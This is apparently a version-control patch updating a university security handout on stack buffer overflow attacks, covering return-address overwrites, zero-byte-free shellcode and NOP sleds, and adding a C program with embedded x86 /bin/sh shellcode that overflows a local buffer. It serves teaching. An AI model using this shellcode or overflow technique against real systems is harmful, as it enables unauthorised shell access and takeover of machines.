# HG changeset patch # User Christian Urban # Date 1412936783 -3600 # Node ID 603cbd28e9881e77774ef2dd32a7a49ea5902bfc # Parent ea921d6a18191cf6549ac9c1d3bd663788dd9094 updated diff -r ea921d6a1819 -r 603cbd28e988 handouts/ho03.pdf Binary file handouts/ho03.pdf has changed diff -r ea921d6a1819 -r 603cbd28e988 handouts/ho03.tex --- a/handouts/ho03.tex Thu Oct 09 23:12:10 2014 +0100 +++ b/handouts/ho03.tex Fri Oct 10 11:26:23 2014 +0100 @@ -67,11 +67,11 @@ programmer explicitly allocates. For us the most interesting region is the stack, which contains data mostly associated with the control flow of the program. Notice that the stack -grows from a higher addresses to lower addresses. That means -that older items on the stack will be stored behind, or after, -newer items. Let's look a bit closer what happens with the -stack when a program is running. Consider the following simple -C program. +grows from higher addresses to lower addresses (i.e.~from the +back to the front). That means that older items on the stack +will be stored behind, or after, newer items. Let's look a bit +closer what happens with the stack when a program is running. +Consider the following simple C program. \lstinputlisting[language=C]{../progs/example1.c} @@ -144,7 +144,7 @@ \pcode{gcc} generate assembly instructions if you call it with the \pcode{-S} option, for example \pcode{gcc -S out in.c}\;. Or you can look at this code by using the debugger. How to do -this will be explained later.}. +this will be explained later.} \begin{center}\small \begin{tabular}[t]{@{}c@{\hspace{8mm}}c@{}} @@ -172,8 +172,8 @@ to the function \pcode{main} to the the instruction just after the call to \pcode{foo}, that is Line 9. -Another part of the ``conspiracy'' is that library functions -in C look typically as follows: +Another part of the ``conspiracy'' of buffer overflow attacks +is that library functions in C look typically as follows: \begin{center} \lstinputlisting[language=C,numbers=none]{../progs/app5.c} @@ -182,19 +182,23 @@ \noindent This function copies data from a source \pcode{src} to a destination \pcode{dst}. The important point is that it copies the data until it reaches a zero-byte (\code{"\\0"}). +This is a convention of the C language which assumes all +strings are terminated by such a zero-byte. The central idea of the buffer overflow attack is to overwrite -the return address on the stack which designates where the -control flow of the program should resume once the function at -hand has finished its computation. So if we have somewhere in -a function a local a buffer, say +the return address on the stack. This address decides where +the control flow of the program should resume once the +function at hand has finished its computation. So if we +can control this address, then we can modify the control +flow of a program. To launch an attack we need +somewhere in a function a local a buffer, say \begin{center} \code{char buf[8];} \end{center} -\noindent -then the corresponding stack will look as follows +\noindent which is filled by some user input. The +corresponding stack of such a function will look as follows \begin{center} \begin{tikzpicture}[scale=0.65] @@ -253,19 +257,22 @@ buffer, is stored on the stack before the older items, like return address and arguments. If it had be the other way around, then such an overwriting by overflowing a local buffer -would just not work. +would just not work. If the designers of C had just been able +to foresee what headaches their way of arranging the stack +caused in the time where computers are accessible from +everywhere. What the outcome of such an attack is can be illustrated with the code shown in Figure~\ref{C2}. Under ``normal operation'' this program ask for a login-name and a password. Both of which are stored in \code{char} buffers of length 8. The function \pcode{match} tests whether two such buffers contain -the same. If yes, then the function lets you ``in'' (by -printing \pcode{Welcome}). If not, it denies access (by +the same content. If yes, then the function lets you ``in'' +(by printing \pcode{Welcome}). If not, it denies access (by printing \pcode{Wrong identity}). The vulnerable function is \code{get_line} in Lines 11 to 19. This function does not take any precautions about the buffer of 8 characters being filled -beyond this 8-character-limit. Let us suppose the login name +beyond its 8-character-limit. Let us suppose the login name is \pcode{test}. Then the buffer overflow can be triggered with a specially crafted string as password: @@ -277,10 +284,10 @@ function \pcode{welcome()}. This means even with this input (where the login name and password clearly do not match) the program will still print out \pcode{Welcome}. The only -information we need for this attack is to know where the -function \pcode{welcome()} starts in memory. This information -can be easily obtained by starting the program inside the -debugger and disassembling this function. +information we need for this attack to work is to know where +the function \pcode{welcome()} starts in memory. This +information can be easily obtained by starting the program +inside the debugger and disassembling this function. \begin{lstlisting}[numbers=none,language={[x86masm]Assembler}, morekeywords={movl,movw}] @@ -310,7 +317,7 @@ \begin{figure}[p] \lstinputlisting[language=C]{../progs/C2.c} -\caption{A suspicious login implementation.\label{C2}} +\caption{A vulnerable login implementation.\label{C2}} \end{figure} This kind of attack was very popular with commercial programs @@ -326,15 +333,14 @@ Unfortunately, much more harm can be caused by buffer overflow attacks. This is achieved by injecting code that will be run once the return address is appropriately modified. Typically -the code that will be injected is for running a shell. This -gives the attacker the ability to run programs on the target -machine and have a good look around, provided the attacked -process was not already running as root.\footnote{In that case -the attacker would do already congratulate him or herself to -another computer under full control.} In order to be send as -part of the string that is overflowing the buffer, we need the -code to be represented as a sequence of characters. For -example +the code that will be injected starts a shell. This gives the +attacker the ability to run programs on the target machine and +to have a good look around, provided the attacked process was not +already running as root.\footnote{In that case the attacker +would already congratulate him or herself to another +computer under full control.} In order to be send as part of +the string that is overflowing the buffer, we need the code to +be represented as a sequence of characters. For example \lstinputlisting[language=C,numbers=none]{../progs/o1.c} @@ -345,7 +351,7 @@ string ready-made---just a quick Google query away. Second, tools like the debugger can help us again. We can just write the code we want in C, for example this would be the program -for starting a shell +for starting a shell: \lstinputlisting[language=C,numbers=none]{../progs/shell.c} @@ -361,22 +367,31 @@ post-processing phase is needed to rewrite the machine code in a way that it does not contain any zero bytes. This is like some works of literature that have been written so that the -letter 'i', for example, is avoided. For rewriting the machine -code, you might need to use clever tricks like +letter e, for example, is avoided. The technical term for such +a literature work is \emph{lipogram}.\footnote{The most +famous example of a lipogram is a 50,000 words novel titled +Gadsby, see \url{https://archive.org/details/Gadsby}.} For +rewriting the machine code, you might need to use clever +tricks like \begin{lstlisting}[numbers=none,language={[x86masm]Assembler}] xor %eax, %eax \end{lstlisting} -\noindent This instruction does not contain any zero byte when -encoded, but produces a zero byte on the stack when run. +\noindent This instruction does not contain any zero-byte when +encoded as string, but produces a zero-byte on the stack when +run. -Having removed the zero bytes we can craft the string that -will be send to the target computer. It is typically of the -form +Having removed the zero-bytes we can craft the string that +will be send to the target computer. This of course requires +that the buffer we are trying to attack can at least contain +the shellcode we want to run. But as you can see this is only +47 bytes, which is a very low bar to jump over. More +formidable is the choice of finding the right address to jump +to. The string is typically of the form \begin{center} - \begin{tikzpicture}[scale=0.7] + \begin{tikzpicture}[scale=0.6] \draw[line width=1mm] (-2, -1) rectangle (2,3); \draw[line width=1mm] (-2,1.9) -- (2,1.9); \draw (0,2.5) node {\large\tt shell code}; @@ -388,22 +403,18 @@ \end{tikzpicture} \end{center} -\noindent This of course requires that the buffer we are -trying to attack can at least contain the shellcode we want to -run. But as you can see this is only 47 bytes, which is a very -low bar to jump over. More formidable is the choice of finding -the right address to jump to. As indicated in the picture we -need to be very precise with the address with which we will -overwrite the buffer. It has to be precisely the first byte of -the shellcode. While this is easy with the help of a debugger -(as seen before), we typically cannot run anything on the -machine yet we target. And the address is very specific to the -setup of the target machine. One way of finding out what the -right address is is to try out one by one until we get lucky. -With the large memories available today, however, the odds are -long. And if we try out too many possible candidates too -quickly, we might be detected by the system administrator of -the target system. +\noindent where we need to be very precise with the address +with which we will overwrite the buffer. It has to be +precisely the first byte of the shellcode. While this is easy +with the help of a debugger (as seen before), we typically +cannot run anything, including a debugger, on the machine yet +we target. And the address is very specific to the setup of +the target machine. One way of finding out what the right +address is is to try out one by one every possible +address until we get lucky. With the large memories available +today, however, the odds are long. And if we try out too many +possible candidates too quickly, we might be detected by the +system administrator of the target system. We can improve our odds considerably by following a clever trick. Instead of adding the shellcode at the beginning of the @@ -411,10 +422,12 @@ the buffer, for example \begin{center} - \begin{tikzpicture}[scale=0.7] + \begin{tikzpicture}[scale=0.6] + \draw[gray!50,fill=gray!50] (-2,0.3) rectangle (2,3); \draw[line width=1mm] (-2, -1) rectangle (2,3); - \draw[line width=1mm] (-2,1.9) -- (2,1.9); - \draw (0,2.5) node {\large\tt shell code}; + \draw[line width=1mm] (-2,0.3) -- (2,0.3); + \draw[line width=1mm] (-2,-0.7) -- (2,-0.7); + \draw (0,-0.2) node {\large\tt shell code}; \draw[line width=1mm,fill=black] (0.3, -1) rectangle (2,-0.7); \draw (-2, 3) node[anchor=north east] {\LARGE \color{codegreen}{``}}; \draw ( 2,-0.9) node[anchor=west] {\LARGE\color{codegreen}{''}}; @@ -422,16 +435,23 @@ \end{center} \noindent Then we can fill up the gray part of the string with -a \pcode{NOP} operation. The code for this operation is +\pcode{NOP} operations. The code for this operation is \code{\\0x90}. It is available on every architecture and its -purpose it to to nothing apart from waiting a small amount of -time. If we now use an address that lets us jump to any -address in the gray area we are done. The target machine will -execute these \pcode{NOP} operations until it reaches the +purpose in a CPU is to do nothing apart from waiting a small +amount of time. If we now use an address that lets us jump to +any address in the gray area we are done. The target machine +will execute these \pcode{NOP} operations until it reaches the shellcode. A moment of thought can convince you that this -trick can hugely improve our odds of finding the right -address---depending on the size of the buffer, it might -only take a few tries to get the shellcode to run. +trick can hugely improve our odds of finding the right +address---depending on the size of the buffer, it might only +take a few tries to get the shellcode to run. And then +we are in. The code for such an attack is show in +Figure~\ref{overflow}. + +\begin{figure}[p] +\lstinputlisting[language=C]{../progs/overflow.c} +\caption{Overwriting a buffer with a paylod.\label{overflow}} +\end{figure} \bigskip\bigskip \subsubsection*{A Crash-Course for GDB} diff -r ea921d6a1819 -r 603cbd28e988 progs/C3.c --- a/progs/C3.c Thu Oct 09 23:12:10 2014 +0100 +++ b/progs/C3.c Fri Oct 10 11:26:23 2014 +0100 @@ -1,19 +1,20 @@ -#include -#include - -// simple program used for a bufferflow attack -// -// for installation notes see C0.c -// -// can be called with -// -// ./C3 `./args3` - -main(int argc, char **argv) -{ - char buffer[80]; - - strcpy(buffer, argv[1]); - - return 1; -} +char shellcode[] = + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" + "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" + "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" + "\xff\xff/bin/sh"; +char large_string[128]; + +void main() { + char buffer[96]; + int i; + long *long_ptr = (long *) large_string; + + for (i = 0; i < 32; i++) + *(long_ptr + i) = (int) buffer; + + for (i = 0; i < strlen(shellcode); i++) + large_string[i] = shellcode[i]; + + strcpy(buffer,large_string); +}